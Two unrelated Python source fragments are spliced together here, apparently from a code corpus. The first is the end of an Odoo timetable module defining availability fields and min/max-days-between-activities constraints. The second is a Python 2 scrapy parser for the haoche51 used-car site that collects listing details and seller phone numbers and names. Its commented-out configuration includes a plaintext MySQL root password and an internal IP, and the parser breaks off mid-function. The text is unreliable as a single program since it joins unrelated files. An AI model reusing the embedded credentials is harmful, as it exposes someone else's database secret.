    # 0 = available, 1 = not available.
    monday = fields.Integer("Monday", size=1)
    tuesday = fields.Integer("Tuesday", size=1)
    wednesday = fields.Integer("Wednesday", size=1)
    thursday = fields.Integer("Thursday", size=1)
    friday = fields.Integer("Friday", size=1)
    saturday = fields.Integer("Saturday", size=1)
    sunday = fields.Integer("Sunday", size=1)
    # Whether each day is enabled in the company timetable configuration.
    is_monday = fields.Boolean("Monday?")
    is_tuesday = fields.Boolean("Tuesday?")
    is_wednesday = fields.Boolean("Wednesday?")
    is_thursday = fields.Boolean("Thursday?")
    is_friday = fields.Boolean("Friday?")
    is_saturday = fields.Boolean("Saturday?")
    is_sunday = fields.Boolean("Sunday?")
    subactivities_timeslots_id = fields.Many2one(
        'op.subactivities.timeslots', "Subactivities Time Slots")
class MinDaysBetweenActivities(models.Model):
    """Scheduling constraint: minimum number of days between a set of activities."""
    _name = 'op.mindays.activities'
    _description = 'Minimum days between a set of activities.'
    _rec_name = 'min_days'

    @api.multi
    @api.constrains('activities_ids')
    def check_activity_count(self):
        """Reject a single-activity set (the constraint needs a pair at least).

        NOTE(review): only len == 1 is rejected; an empty set passes —
        confirm whether zero activities should also raise here.
        """
        for rec in self:
            if len(rec.activities_ids) == 1:
                raise UserError(_("Please add more than 1 activity."))

    @api.multi
    @api.constrains('min_days')
    def check_min_days_gap(self):
        """The day gap must be at least 1."""
        for rec in self:
            if rec.min_days < 1:
                raise UserError(_("The gap should be greater than 0"))

    activities_ids = fields.Many2many('op.faculty.class.list', 'activity_mindays_rel', 'activity_id', 'minday_id', "Activities")
    min_days = fields.Integer("Minimum Days", default=1)
    same_day = fields.Boolean("Activities are on the same day")
    weight = fields.Integer("Weight Percentage", default=100)
class MaxDaysBetweenActivities(models.Model):
    """Scheduling constraint: maximum number of days between a set of activities."""
    _name = 'op.maxdays.activities'
    _description = 'Maximum days between a set of activities.'
    _rec_name = 'max_days'

    @api.multi
    @api.constrains('activities_ids')
    def check_activity_count(self):
        """Reject a single-activity set (the constraint needs a pair at least).

        NOTE(review): only len == 1 is rejected; an empty set passes —
        confirm whether zero activities should also raise here.
        """
        for rec in self:
            if len(rec.activities_ids) == 1:
                raise UserError(_("Please add more than 1 activity."))

    @api.multi
    @api.constrains('max_days')
    def check_max_days_gap(self):
        """The day gap must be at least 1."""
        for rec in self:
            if rec.max_days < 1:
                raise UserError(_("The gap should be greater than 0"))

    activities_ids = fields.Many2many('op.faculty.class.list', 'activity_maxdays_rel', 'activity_id', 'maxday_id', "Activities")
    max_days = fields.Integer("Maximum Days", default=1)
    weight = fields.Integer("Weight Percentage", default=100)
|
#-*- coding: UTF-8 -*-
import json
import math
import re
import sys
import time
import pandas
import pp
import scrapy
# sys
reload(sys)
sys.setdefaultencoding('utf8')
#load funcs
from Parse_Init import *
from SaveData import *
from PP_Init import *
#basesetting
def Init():
    """Build the parameter dict used to parse and persist haoche51 pages.

    Starts from the shared defaults returned by ParseInit(website) and
    overrides the table-creation SQL and target table name for this site.
    Returns the params dict consumed by parse().
    """
    # params
    website = 'haoche51'
    params = ParseInit(website)
    # mysql redefine: one wide varchar staging table, one column per field
    # produced by the parse_* helpers below
    params['createsql'] = """CREATE TABLE IF NOT EXISTS `haoche51` (
`id` bigint(20) NOT NULL auto_increment,
`website` varchar(63) DEFAULT NULL,
`carid` varchar(63) DEFAULT NULL,
`title` varchar(127) DEFAULT NULL,
`pagetitle` varchar(127) DEFAULT NULL,
`url` varchar(127) DEFAULT NULL,
`grabtime` varchar(63) DEFAULT NULL,
`pagetime` varchar(63) DEFAULT NULL,
`parsetime` varchar(63) DEFAULT NULL,
`price1` varchar(63) DEFAULT NULL,
`status` varchar(63) DEFAULT NULL,
`statusplus` varchar(127) DEFAULT NULL,
`makeyear` varchar(63) DEFAULT NULL,
`registerdate` varchar(63) DEFAULT NULL,
`years` varchar(63) DEFAULT NULL,
`mileage` varchar(63) DEFAULT NULL,
`mileperage` varchar(63) DEFAULT NULL,
`color` varchar(63) DEFAULT NULL,
`province` varchar(63) DEFAULT NULL,
`city` varchar(63) DEFAULT NULL,
`region` varchar(63) DEFAULT NULL,
`dealplace` varchar(63) DEFAULT NULL,
`registerplace` varchar(63) DEFAULT NULL,
`changetimes` varchar(63) DEFAULT NULL,
`changedate` varchar(63) DEFAULT NULL,
`Insurance1` varchar(63) DEFAULT NULL,
`Insurance2` varchar(63) DEFAULT NULL,
`yearchecktime` varchar(63) DEFAULT NULL,
`carokcf` varchar(63) DEFAULT NULL,
`carcard` varchar(63) DEFAULT NULL,
`carinvoice` varchar(63) DEFAULT NULL,
`accident` varchar(63) DEFAULT NULL,
`useage` varchar(63) DEFAULT NULL,
`telphone` varchar(63) DEFAULT NULL,
`dealor` varchar(127) DEFAULT NULL,
`brand_name` varchar(63) DEFAULT NULL,
`class_name` varchar(63) DEFAULT NULL,
`guideprice` varchar(63) DEFAULT NULL,
`guidepricetax` varchar(63) DEFAULT NULL,
`newcartitle` varchar(127) DEFAULT NULL,
`newcarurl` varchar(127) DEFAULT NULL,
`geartype` varchar(63) DEFAULT NULL,
`emission` varchar(63) DEFAULT NULL,
`output` varchar(63) DEFAULT NULL,
`level` varchar(63) DEFAULT NULL,
`motor` varchar(63) DEFAULT NULL,
`gear` varchar(63) DEFAULT NULL,
`gearnumber` varchar(63) DEFAULT NULL,
`lengthwh` varchar(63) DEFAULT NULL,
`length` varchar(63) DEFAULT NULL,
`width` varchar(63) DEFAULT NULL,
`height` varchar(63) DEFAULT NULL,
`wheelbase` varchar(63) DEFAULT NULL,
`body` varchar(63) DEFAULT NULL,
`doors` varchar(63) DEFAULT NULL,
`seats` varchar(63) DEFAULT NULL,
`bodystyle` varchar(63) DEFAULT NULL,
`weight` varchar(63) DEFAULT NULL,
`luggage` varchar(63) DEFAULT NULL,
`motortype` varchar(63) DEFAULT NULL,
`method` varchar(63) DEFAULT NULL,
`lwvnumber` varchar(63) DEFAULT NULL,
`compress` varchar(63) DEFAULT NULL,
`maxps` varchar(63) DEFAULT NULL,
`maxnm` varchar(63) DEFAULT NULL,
`fuelnumber` varchar(63) DEFAULT NULL,
`fuelmethod` varchar(63) DEFAULT NULL,
`driveway` varchar(63) DEFAULT NULL,
`fronthang` varchar(63) DEFAULT NULL,
`backhang` varchar(63) DEFAULT NULL,
`assistanttype` varchar(63) DEFAULT NULL,
`frontbrake` varchar(63) DEFAULT NULL,
`backbrake` varchar(63) DEFAULT NULL,
`hubtype` varchar(63) DEFAULT NULL,
`frontwheel` varchar(63) DEFAULT NULL,
`backwheel` varchar(63) DEFAULT NULL,
`bn_bo` varchar(63) DEFAULT NULL,
`bq_br` varchar(63) DEFAULT NULL,
`bs_bp` varchar(63) DEFAULT NULL,
`bx` varchar(63) DEFAULT NULL,
`cc` varchar(63) DEFAULT NULL,
`cc1` varchar(63) DEFAULT NULL,
`cd` varchar(63) DEFAULT NULL,
`ch` varchar(63) DEFAULT NULL,
`ci` varchar(63) DEFAULT NULL,
`dy` varchar(63) DEFAULT NULL,
`dz` varchar(63) DEFAULT NULL,
`ea` varchar(63) DEFAULT NULL,
`eb` varchar(63) DEFAULT NULL,
`ec` varchar(63) DEFAULT NULL,
`ef` varchar(63) DEFAULT NULL,
`em` varchar(63) DEFAULT NULL,
`ei_ej` varchar(63) DEFAULT NULL,
`es` varchar(63) DEFAULT NULL,
`cw` varchar(63) DEFAULT NULL,
`db_dc` varchar(63) DEFAULT NULL,
`dh_di` varchar(63) DEFAULT NULL,
`dl` varchar(63) DEFAULT NULL,
`cq` varchar(63) DEFAULT NULL,
`cu` varchar(63) DEFAULT NULL,
`cv` varchar(63) DEFAULT NULL,
`et` varchar(63) DEFAULT NULL,
`airconditiontype` varchar(63) DEFAULT NULL,
`totalcheck` varchar(511) DEFAULT NULL,
`accidentscore` varchar(63) DEFAULT NULL,
`accidentdesc` varchar(511) DEFAULT NULL,
`outerscore` varchar(63) DEFAULT NULL,
`outerdesc` varchar(511) DEFAULT NULL,
`innerscore` varchar(63) DEFAULT NULL,
`innerdesc` varchar(511) DEFAULT NULL,
`safescore` varchar(63) DEFAULT NULL,
`safedesc` varchar(511) DEFAULT NULL,
`roadscore` varchar(63) DEFAULT NULL,
`roaddesc` varchar(511) DEFAULT NULL,
`desc` varchar(511) DEFAULT NULL,
`img_url` varchar(511) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;"""
    params['mysqltable'] = 'haoche51'
    # Connection / storage overrides below are inherited from ParseInit;
    # kept commented-out as a record of the deployed defaults.
    # params['mysqltable']=params['website']
    # params['mysqlip']="192.168.1.92"
    # params['mysqluser']="root"
    # params['mysqlpasswd']="Datauser@2016"
    # params['mysqldbname']="usedcar"
    # params['mysqlport']=3306
    # mongo redefine
    # params['mongocoll']=params['website']
    # params['mongoip']="192.168.1.92"
    # params['mongoport']=27071
    # params['mongodbname']="usedcar"
    # df redefine
    # params['bfrate']=0.001
    # params['keycol']="statusplus"
    # carinfocreate redefine
    # params['carinfocreate'] = False
    # counts redefine
    # params['counts']=0
    # size redefine
    # params['savesize']=1000
    return params
def parse_original(item):
    """Extract bookkeeping fields from a crawled item.

    item: dict produced by the crawler; expects keys 'website', 'url',
    'grabtime', 'pagetime' and 'status'.
    Returns a dict with the site name, url, numeric car id, crawl/parse
    timestamps and the normalized sale status.
    Raises IndexError when the url contains no '/<digits>' segment or the
    status string contains neither 'sale' nor 'sold' (same as before).
    """
    caritem = dict()
    # key info
    caritem['website'] = item['website']
    caritem['url'] = item['url']
    # car id = first run of digits that follows a '/' in the url
    # (capture group replaces the old findall+sub('/') round-trip)
    caritem['carid'] = re.findall(r'/(\d+)', item['url'])[0]
    caritem['grabtime'] = item['grabtime']
    caritem['pagetime'] = item['pagetime']  # new
    caritem['parsetime'] = time.strftime('%Y-%m-%d %X', time.localtime())
    # status: normalized 'sale'/'sold' flag plus the raw string
    # (raw string is used downstream as the de-duplication key column)
    caritem['status'] = str(re.findall(r'sale|sold', item["status"])[0])
    caritem['statusplus'] = item["status"]
    return caritem
def parse_keyinfo(dom):
    """Extract page title, listing title, price and model year.

    dom: scrapy Selector over the detail-page HTML.
    Returns a dict with keys 'pagetitle', 'title', 'price1', 'makeyear';
    values that cannot be found are recorded as '-'.
    """
    # caritem init
    caritem = dict()
    # keyinfo
    #caritem['carid'] = dom.xpath('//div[@class="rpt-cid"]/text()').re('\d+')[0] \
    #if dom.xpath('//div[@class="rpt-cid"]/text()') else '-'
    caritem['pagetitle'] = dom.xpath('//title/text()').extract_first()  # new
    caritem['title'] = dom.xpath('//h1[@id="detail-ctitle"]/text()').extract_first().strip() \
        if dom.xpath('//h1[@id="detail-ctitle"]/text()') else '-'
    # price appears under two alternative page layouts
    if dom.xpath('//div[@class="ftlf emph"]/span/text()'):
        caritem['price1'] = dom.xpath('//div[@class="ftlf emph"]/span/text()').extract_first()
    elif dom.xpath('//div[@class="price"]/span[@class="emph"]/text()'):
        caritem['price1'] = dom.xpath('//div[@class="price"]/span[@class="emph"]/text()').extract_first()
    else:
        # BUG FIX: original read `else: "-"` — a no-op expression that left
        # 'price1' unset and caused a missing column downstream.
        caritem['price1'] = "-"
    # model year: first "<digits>款" or "<digits>年" run in the title
    caritem['makeyear'] = re.compile(u'\u6b3e'+'|'+u'\u5e74').sub('',re.findall('\d+'+u'\u6b3e'+'|'+'\d+'+u'\u5e74',caritem['title'])[0]) \
        if re.findall('\d+'+u'\u6b3e'+'|'+'\d+'+u'\u5e74',caritem['title']) else "-"
    return caritem
def parse_baseinfo(dom):
    """Extract registration date, mileage, gearbox type and location fields.

    dom: scrapy Selector over the detail-page HTML.
    The header <h2> text is presumably a '|'-separated summary line
    (register date | mileage | gear type | plate place) — TODO confirm
    against a live page. Missing values are recorded as '-'.
    """
    # caritem init
    caritem = dict()
    # baseinfo
    if dom.xpath('//div[@class="autotit txac"]/h2/text()').extract_first():
        path = dom.xpath('//div[@class="autotit txac"]/h2/text()').extract_first()
        # "YYYY.MM上牌" -> "YYYY-MM-01"
        caritem['registerdate'] = re.compile('\.').sub('-',re.compile(u'\u4e0a\u724c').sub('',path.split('|')[0]))+'-01' \
            if len(path.split('|'))>=1 else "-"
        caritem['mileage'] = '.'.join(re.findall('\d+',path.split('|')[1])) \
            if len(path.split('|'))>=2 else "-"
        caritem['geartype'] = path.split('|')[2] \
            if len(path.split('|'))>=3 else "-"
        # strip the "牌照" (plate) label
        caritem['registerplace'] = re.compile(u'\u724c\u7167').sub('',path.split('|')[3]) \
            if len(path.split('|'))>=4 else "-"
    else:
        # BUG FIX: the original had no else branch, leaving these four keys
        # unset when the header is missing and breaking the fixed-column save.
        caritem['registerdate'] = "-"
        caritem['mileage'] = "-"
        caritem['geartype'] = "-"
        caritem['registerplace'] = "-"
    caritem['years'] = "-"  # new
    caritem['mileperage'] = "-"  # new
    caritem['region'] = dom.xpath('//a[@class="citico"]/text()').extract_first() \
        if dom.xpath('//a[@class="citico"]/text()') else "-"
    caritem['province'] = "-"
    caritem['city'] = "-"
    caritem['dealplace'] = dom.xpath('//span[@id="kanche_addr"]/@data-city').extract_first() \
        if dom.xpath('//span[@id="kanche_addr"]/@data-city') else "-"
    caritem['changetimes'] = re.findall('\d+',dom.xpath('//div[@class="autotit txac"]/h2/text()[2]').extract_first())[0] \
        if dom.xpath('//div[@class="autotit txac"]/h2/text()[2]') else "-"
    caritem['changedate'] = '-'.join(dom.xpath('//div[@class="autotit txac"]/h2/i/text()').re('\d+')) \
        if dom.xpath('//div[@class="autotit txac"]/h2/i/text()') else "-"
    return caritem
def parse_certification(dom):
    """Extract insurance / inspection / certificate fields from the page.

    All values come from successive text() nodes of the <div> located by the
    "\u4ea4\u5f3a\u9669\u6709\u6548\u671f" (compulsory-insurance validity)
    label; each field falls back to '-' when its node is absent.
    NOTE(review): the per-node layout (text()[1]..[6]) is assumed stable —
    confirm against a live page before changing any index.
    """
    # caritem init
    caritem = dict()
    # certification
    caritem['Insurance1'] = '-'.join(dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[1]').re('\d+')) \
        if dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[1]') else "-"
    # nodes 2..6 share the format "<label>】<value>"; strip label prefixes
    caritem['Insurance2'] = re.compile(u'\u65e0').sub('',re.compile(u'\u5546\u4e1a\u9669').sub('',
        dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[2]').extract_first().split(u'\u3011')[1])) \
        if dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[2]') else "-"
    caritem['yearchecktime'] = re.compile(u'\u5546\u4e1a\u9669').sub('',dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[3]').extract_first().split(u'\u3011')[1]) \
        if dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[3]') else "-"
    caritem['carokcf'] = re.compile(u'\u5546\u4e1a\u9669').sub('',dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[4]').extract_first().split(u'\u3011')[1]) \
        if dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[4]') else "-"
    caritem['carcard'] = re.compile(u'\u5546\u4e1a\u9669').sub('',dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[5]').extract_first().split(u'\u3011')[1]) \
        if dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[5]') else "-"
    caritem['carinvoice'] = re.compile(u'\u5546\u4e1a\u9669').sub('',dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[6]').extract_first().split(u'\u3011')[1]) \
        if dom.xpath(u'//div[contains(text(),"\u4ea4\u5f3a\u9669\u6709\u6548\u671f")]/text()[6]') else "-"
    caritem['accident'] = "-"  # new
    caritem['useage'] = "-"  # new
    return caritem
def parse_dealor(dom):
    """Extract seller contact fields (phone number and dealer/owner name).

    Missing values are recorded as '-'.
    """
    # caritem init
    caritem = dict()
    # dealer
    caritem['telphone'] = dom.xpath('//span[@class="tel-f00-18"]/text()').extract_first() \
        if dom.xpath('//span[@class="tel-f00-18"]/text()') else "-"
    # strip the "\u8f66\u4e3b" (owner) / "\u62a5\u4ef7" (quote) labels
    caritem['dealor'] = re.compile(u'\u8f66\u4e3b'+'|'+u'\u62a5\u4ef7').sub('',dom.xpath('//div[@class="own-nme"]/text()').extract_first()) \
        if dom.xpath('//div[@class="own-nme"]/text()') else "-"  # new
    # The assignments below were disabled by wrapping them in a string
    # literal (note the broken `-"` on the middle line); kept verbatim.
    '''
    caritem['dealortype'] = "-" # new
    caritem['dealorcompany'] = -" # new
    caritem['dealorlocation'] = "-" # new
    '''
    return caritem
def parse_createinfo(carinfocreate, website, mysqldb):
    """Return the Chinese -> English column-name map for the car spec table.

    carinfocreate: when truthy, also persist the mapping to MySQL as table
        '<website>_carinfo' (replacing any previous copy).
    website: site name used to build the table name.
    mysqldb: SQLAlchemy-compatible connection passed to DataFrame.to_sql.
    Returns the mapping dict (always, regardless of carinfocreate).
    """
    carinfors_name = {u'\u4e0a\u5761\u8f85\u52a9': 'ci', u'\u4f9b\u6cb9\u65b9\u5f0f': 'fuelmethod',
                      u'\u8f66\u8eab\u7a33\u5b9a\u63a7\u5236(ESP)': 'ch', u'\u8fdb\u6c14\u5f62\u5f0f': 'method',
                      u'\u6700\u5927\u9a6c\u529b(Ps)': 'maxps', u'\u513f\u7ae5\u5ea7\u6905\u63a5\u53e3': 'bx',
                      u'\u8f74\u8ddd(mm)': 'wheelbase', u'\u7ea7\u522b': 'level',
                      u'\u591a\u529f\u80fd\u65b9\u5411\u76d8': 'cu', u'\u524d\u96fe\u706f': 'ef',
                      u'\u6700\u5927\u626d\u77e9(N*m)': 'maxnm', u'\u65e0\u94a5\u5319\u8fdb\u5165': 'cc1',
                      u'\u957f\u5bbd\u9ad8(mm)': 'lengthwh', u'\u8f66\u8eab\u7ed3\u6784': 'body',
                      u'\u524d\u60ac\u67b6\u7c7b\u578b': 'fronthang', u'\u5382\u5546\u6307\u5bfc\u4ef7': 'guideprice',
                      u'\u65e5\u95f4\u884c\u8f66\u706f': 'ec', u'\u611f\u5e94\u96e8\u5237': 'es',
                      u'\u6c19\u6c14\u5927\u706f': 'ea', u'\u7535\u52a8\u5929\u7a97': 'dy',
                      u'\u94dd\u5408\u91d1\u8f6e\u5708': 'hubtype', u'\u5168\u666f\u5929\u7a97': 'dz',
                      u'ABS \u9632\u62b1\u6b7b': 'cd', u'\u540e\u89c6\u955c\u7535\u52a8\u8c03\u8282': 'em',
                      u'\u65b9\u5411\u76d8\u6362\u6321': 'cv', u'\u540e\u6392\u5ea7\u6905\u653e\u5012\u65b9\u5f0f': 'dl',
                      u'\u71c3\u6cb9\u6807\u53f7': 'fuelnumber', u'\u65e0\u94a5\u5319\u542f\u52a8': 'cc',
                      u'\u4e3b/\u526f\u9a7e\u9a76\u5ea7\u5b89\u5168\u6c14\u56ca': 'bn_bo', u'\u524d\u8f6e\u80ce\u89c4\u683c': 'frontwheel',
                      u'\u540e\u60ac\u67b6\u7c7b\u578b': 'backhang', u'\u771f\u76ae\u65b9\u5411\u76d8': 'cq',
                      u'\u538b\u7f29\u6bd4': 'compress', u'\u4e3b/\u526f\u9a7e\u9a76\u5ea7\u7535\u52a8\u8c03\u8282': 'db_dc',
                      u'\u6574\u5907\u8d28\u91cf(kg)': 'weight', u'\u52a9\u529b\u7c7b\u578b': 'assistanttype',
                      u'LED \u5927\u706f': 'eb', u'\u53d1\u52a8\u673a': 'motor',
                      u'\u524d/\u540e\u6392\u5934\u90e8\u6c14\u56ca': 'bs_bp', u'\u53d1\u52a8\u673a\u578b\u53f7': 'motortype',
                      u'\u524d\u5236\u52a8\u5668\u7c7b\u578b': 'frontbrake', u'\u540e\u5236\u52a8\u5668\u7c7b\u578b': 'backbrake',
                      u'\u53d8\u901f\u7bb1': 'gear', u'\u524d/\u540e\u6392\u5ea7\u6905\u52a0\u70ed': 'dh_di',
                      u'\u9a71\u52a8\u65b9\u5f0f': 'driveway', u'\u5b9a\u901f\u5de1\u822a': 'et',
                      u'\u884c\u674e\u7bb1\u5bb9\u79ef(L)': 'luggage', u'\u6392\u91cf(L)': 'output',
                      u'\u771f\u76ae/\u4eff\u76ae\u5ea7\u6905': 'cw', u'\u6c7d\u7f38\u6570(\u4e2a)': 'lwvnumber',
                      u'\u524d/\u540e\u7535\u52a8\u8f66\u7a97': 'ei_ej', u'\u7a7a\u8c03\u63a7\u5236\u65b9\u5f0f': 'airconditiontype',
                      u'\u524d/\u540e\u6392\u4fa7\u6c14\u56ca': 'bq_br', u'\u540e\u8f6e\u80ce\u89c4\u683c': 'backwheel'}
    if carinfocreate:
        # Build the DataFrame only when it is actually persisted (the
        # original built it unconditionally and also pointlessly reassigned
        # the local `carinfocreate` flag).  list(...) keeps this valid on
        # Python 3 where dict.items() is a view.
        carinforsdf = pandas.DataFrame(list(carinfors_name.items()), columns=['name_cn', 'name_en'])
        # NOTE(review): `flavor='mysql'` was removed in modern pandas; this
        # call targets the legacy pandas version the project pinned.
        carinforsdf.to_sql(name=website + '_carinfo', con=mysqldb, flavor='mysql',
                           if_exists='replace')
    return carinfors_name
def parse_carinfo1(dom):
    """Extract brand/class names, emission standard, color and guide price.

    Brand and class names are sliced out of an inline <script> blob that
    contains "brand_name"/"class_name"/"vehicle_id" assignments (the +12/-3
    offsets skip the key text and surrounding quote/comma characters —
    presumably tuned to that blob's exact format; TODO confirm).
    Missing values are recorded as '-'.
    """
    # caritem init
    caritem = dict()
    # carinfo
    if dom.xpath('//script[contains(text(),"brand_name")]/text()'):
        namelist = dom.xpath('//script[contains(text(),"brand_name")]/text()').extract_first()
        brandlocation = namelist.find('brand_name')
        classlocation = namelist.find('class_name')
        vehiclelocation = namelist.find('vehicle_id')
        if brandlocation!=-1 and classlocation!=-1:
            caritem['brand_name'] = namelist[brandlocation+12:classlocation-3].strip().strip("'")
            caritem['class_name'] = namelist[classlocation+12:vehiclelocation-3].strip().strip("'")
        else:
            caritem['brand_name'] = "-"
            caritem['class_name'] = "-"
    else:
        # BUG FIX: the original had no else branch here, leaving both keys
        # unset when the script tag is absent (missing column downstream).
        caritem['brand_name'] = "-"
        caritem['class_name'] = "-"
    # strip the "\u6392\u653e" (emission) label
    caritem['emission'] = re.compile(u'\u6392\u653e').sub('',dom.xpath('//div[@class="autotit txac"]/h2/span[@class="cspt"]/text()').extract_first()) \
        if dom.xpath('//div[@class="autotit txac"]/h2/span[@class="cspt"]/text()') else "-"
    caritem['color'] = dom.xpath(
        u'//div[@class="det-basinfor"]/ul/li/label[contains(text(),"\u8f66\u8eab\u989c\u8272")]/../text()').extract_first() \
        if dom.xpath(u'//div[@class="det-basinfor"]/ul/li/label[contains(text(),"\u8f66\u8eab\u989c\u8272")]/../text()') else "-"  # new
    caritem['guidepricetax'] = dom.xpath('//span[@class="txde"]/text()').extract_first() \
        if dom.xpath('//span[@class="txde"]/text()') else "-"
    caritem['newcartitle'] = "-"
    caritem['newcarurl'] = "-"  # new
    return caritem
def parse_carinfo2(dom,carinfors_name):
    """Extract the detailed spec table and derive split-out fields.

    carinfors_name: Chinese->English column map from parse_createinfo().
    The spec list alternates label/value items; labels are remapped to the
    English column names, unknown columns default to '-'.
    NOTE(review): uses dict.has_key(), so this function is Python 2 only.
    """
    # caritem init
    caritem = dict()
    # carinfo: flat list of alternating <li> label/value text nodes
    mycarinfo=[]
    mys = dom.xpath('//div[@class ="parcon-box ftzm ptb20"]/div/ul/li/text()')
    for sel in mys:
        a=(sel.extract())
        mycarinfo.append(a)
    # Chinese carinfo: pair items (0,1), (2,3), ... into a label->value dict
    carinfors_cn={}
    for i in range(0,len(mycarinfo)-1,2) :
        name = mycarinfo[i]
        info = mycarinfo[i+1]
        inforitem={name:info}
        carinfors_cn=dict(carinfors_cn,**inforitem)
    # remap to English column names; missing labels become '-'
    carinfors=dict()
    for name in carinfors_name.keys():
        if carinfors_cn.has_key(name):
            name_en = carinfors_name[name]
            infor=carinfors_cn[name]
            inforitem={name_en:infor}
            carinfors=dict(carinfors,**inforitem)
        else:
            name_en = carinfors_name[name]
            infor='-'
            inforitem={name_en:infor}
            carinfors=dict(carinfors,**inforitem)
    # copy remapped values into the output item
    for name in carinfors.keys():
        caritem[name] = carinfors[name]
    # derived fields: split "L*W*H" into individual dimensions
    if caritem['lengthwh']== "-":
        caritem['length'] = "-"
        caritem['width'] = "-"
        caritem['height'] = "-"
    elif len(caritem['lengthwh'].split('*'))>=3:
        caritem['length'] = caritem['lengthwh'].split('*')[0]
        caritem['width'] = caritem['lengthwh'].split('*')[1]
        caritem['height'] = caritem['lengthwh'].split('*')[2]
    # strip the currency sign and "\u4e07\u5143" (10k yuan) unit
    caritem['guideprice'] = re.compile(u'\uffe5'+'|'+u'\u4e07\u5143').sub('',caritem['guideprice'])
    # gear count: digits before "\u6321"/"\u6863" in the gearbox description
    caritem['gearnumber'] = re.compile(u'\u6321'+'|'+u'\u6863').sub('',re.findall('\d+'+u'\u6321'+'|'+'\d+'+u'\u6863',caritem['gear'])[0]) \
        if re.findall(u'\u6321'+'|'+u'\u6863',caritem['gear']) else '-'
    # doors / seats / body style parsed out of the body description
    caritem['doors'] = re.compile(u'\u95e8').sub('',re.findall('\d+'+u'\u95e8',caritem['body'])[0]) \
        if re.findall('\d+'+u'\u95e8',caritem['body']) else '-'
    caritem['seats'] = re.compile(u'\u5ea7').sub('',re.findall('\d+'+u'\u5ea7',caritem['body'])[0]) \
        if re.findall('\d+'+u'\u5ea7',caritem['body']) else '-'
    caritem['bodystyle'] = re.findall(u'\u4e24\u53a2'+'|'+u'\u4e09\u53a2',caritem['body'])[0] \
        if re.findall(u'\u4e24\u53a2'+'|'+u'\u4e09\u53a2',caritem['body']) else '-'
    return caritem
def parse_otherinfo(dom):
    """Placeholder extractor: currently contributes no extra fields.

    Kept so the parse() pipeline stays uniform; returns an empty dict.
    """
    return dict()
def parse_checkpoints(dom):
    """Extract the five inspection-report sections: per-section description,
    per-section score, and the overall verdict.

    NOTE(review): the fixed range(0,5) loops assume the page always renders
    exactly five sections; a shorter extract() list raises IndexError and the
    caller's except swallows it — confirm whether that is acceptable.
    """
    # caritem init
    caritem = dict()
    # desc: section title -> description-column mapping
    descnames = {u'\u5185\u9970\u68c0\u6d4b': 'innerdesc', u'\u8bbe\u5907\u548c\u5b89\u5168\u6027': 'safedesc',
                 u'\u4e8b\u6545\u6392\u67e5': 'accidentdesc', u'\u673a\u68b0\u548c\u8def\u6d4b': 'roaddesc',
                 u'\u5916\u89c2\u68c0\u6d4b': 'outerdesc'}
    myname = dom.xpath('//h4[@class="dtc-h4"]')
    myinfo = dom.xpath('//div[@style="padding-top:6px;"]')
    # pair the i-th section heading with the i-th description block
    descnames_cn={}
    for i in range(0,5) :
        name=myname.xpath('text()').extract()[i].strip() if myname.xpath('text()') else '-'
        info=myinfo.xpath('text()').extract()[i].strip() if myinfo.xpath('text()') else '-'
        inforitem={name:info}
        descnames_cn=dict(descnames_cn,**inforitem)
    # remap to English column names; missing sections become '-'
    descnames_info=dict()
    for name in descnames.keys():
        if descnames_cn.has_key(name):
            name_en = descnames[name]
            infor=descnames_cn[name]
            inforitem={name_en:infor}
            descnames_info=dict(descnames_info,**inforitem)
        else:
            name_en = descnames[name]
            infor='-'
            inforitem={name_en:infor}
            descnames_info=dict(descnames_info,**inforitem)
    for name in descnames_info.keys():
        caritem[name] = descnames_info[name]
    # score: same five sections mapped to the score columns
    scorenames = {u'\u5185\u9970\u68c0\u6d4b': 'innerscore', u'\u8bbe\u5907\u548c\u5b89\u5168\u6027': 'safescore',
                  u'\u4e8b\u6545\u6392\u67e5': 'accidentscore', u'\u673a\u68b0\u548c\u8def\u6d4b': 'roadscore',
                  u'\u5916\u89c2\u68c0\u6d4b': 'outerscore'}
    mys = dom.xpath('//div[@class="profile-scores"]')
    scorenames_cn={}
    for i in range(0,5) :
        name=mys.xpath('ul/li/text()').extract()[i].strip() if mys.xpath('ul/li/text()') else '-'
        info=mys.xpath('ul/li/span/b/text()').extract()[i].strip() if mys.xpath('ul/li/span/b/text()') else '-'
        inforitem={name:info}
        scorenames_cn=dict(scorenames_cn,**inforitem)
    scorenames_info=dict()
    for name in scorenames.keys():
        if scorenames_cn.has_key(name):
            name_en = scorenames[name]
            infor=scorenames_cn[name]
            inforitem={name_en:infor}
            scorenames_info=dict(scorenames_info,**inforitem)
        else:
            name_en = scorenames[name]
            infor='-'
            inforitem={name_en:infor}
            scorenames_info=dict(scorenames_info,**inforitem)
    for name in scorenames_info.keys():
        caritem[name] = str(scorenames_info[name])
    # total: overall inspection verdict text
    caritem['totalcheck'] = dom.xpath('//div[@class="ckr-sug"]/text()').extract_first() \
        if dom.xpath('//div[@class="ckr-sug"]/text()') else "-"
    return caritem
def parse_desc(dom):
    """Extract the meta description (capped at 500 chars) and main photo url.

    Missing values are recorded as '-'.
    """
    caritem = dict()
    # page description from the <meta name="description"> tag
    desc_nodes = dom.xpath('//meta[@name="description"]/@content')
    if desc_nodes:
        caritem['desc'] = desc_nodes.extract_first()
    else:
        caritem['desc'] = "-"
    # keep within the varchar(511) column budget
    if len(caritem['desc']) > 500:
        caritem['desc'] = caritem['desc'][:500]
    # main listing image
    img_nodes = dom.xpath('//img[@class="item-img"]/@src')
